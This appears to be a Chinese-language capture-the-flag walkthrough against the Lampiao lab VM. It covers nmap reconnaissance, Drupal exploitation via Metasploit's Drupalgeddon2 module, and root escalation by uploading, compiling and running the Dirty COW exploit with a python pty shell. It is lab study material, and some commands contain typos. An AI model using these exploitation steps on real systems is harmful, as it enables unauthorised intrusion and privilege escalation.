因为lampiao账号密码未知的,使用主机扫描,
1、扫描网络中活动的主机
扫描192.168.29.0/24网络中活动的主机,从而获取靶机IP地址
nmap -sP 192.168.163.0/24
找到:192.168.163.142
2、扫描主机开放的端口和服务
扫描结果我们基本可以确定目标靶机的ip为192.168.163.142
nmap -p 1-65535 - -sV 192.168.163.142命令进行端口扫描
开启了22、80、1898端口
分别访问了22、80、1898端口;22端口无法访问;80端口如下,
1898端口如下
3、扫描主机的操作系统和版本号
nmap -O 192.168.163.142
(4)扫描主机可能存在的已知漏洞
Nmap --script=vuln -p22,80,1898 192.163.142
没有找到任何漏洞
nessus扫描
在目录中发现了robots.txt文件
查看CHANGELOG.txt文件,发现网站的版本信息
msfconsole //启动msf
Search drupal
尝试了第一个结果失败
尝试第二个:1 exploit/unix/webapp/drupal_drupalgeddon2 2018-03-28 excellent Yes Drupal Drupalgeddon 2 Forms API Property Injection
设置主机,端口等,运行漏洞
pwd是目标主机的工作目录,getuid #查看当前登录的账号,www-data是普通用户
继续提权
脏牛漏洞
searchsploit dirty
上传漏洞的源码到靶机上
meterpreter > upload /usr/share/exploitdb/exploits/linux/local/40847.cpp /tmp
使用python调出交互模式
python -c "import pty; pty.spawn('/bin/bash')"
g++ -Wall -pedantic -o2 -std=c++11 -pthread -o dcow 40847.cpp -luti
./dcow -s运行
提权成功